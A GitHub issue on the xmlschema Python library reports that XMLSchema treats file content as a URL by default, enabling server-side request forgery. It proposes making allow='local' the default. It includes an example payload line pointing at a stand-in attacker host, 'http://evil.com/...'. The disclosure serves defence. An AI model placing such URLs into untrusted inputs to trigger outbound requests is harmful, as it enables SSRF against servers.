-
Notifications
You must be signed in to change notification settings - Fork 81
Description
Today, the XMLResource object source can be a remote URL, local URL, file path, or string literal. When loaded, the XMLResource tries to parse the given source first as a URL, then as a Path (local file), then as a string literal*.
The new-user documentation on "Create a schema instance" does not mention this behavior except for the section "Creating a local copy of a remote XSD schema for offline use." The "Validation" documentation is similar.
A user may, roughly following the documentation, write the following:
import xmlschema
with open('local.xsd', 'r') as infile:
data = infile.read()
xmlschema.XMLSchema(data)If local.xsd is indeed an XSD file, we have no problem. However, imagine local.xsd comes from an untrusted location. If a malicious actor could set the content of local.xsd to:
http://evil.com/myfavoritepayload
Then calling xmlschema.XMLSchema() will make a HTTP GET to that URL. This is Server-Side Request Forgery (SSRF).
This can be mitigated by using the allow setting:
import xmlschema
with open('local.xsd', 'r') as infile:
data = infile.read()
resource = xmlschema.XMLResource(
source=data,
allow='local',
)
xmlschema.XMLSchema(resource)However, the default behavior has allow='all'.
Would you consider changing the default to allow='local' and releasing a new major version? I understand this would be a breaking change for end users, but I believe the pain of upgrading to a new major version is worth mitigating the risk of this default.
*Technically there is additional complexity with bytes-like and StringIO-like objects but that is not relevant for this discussion.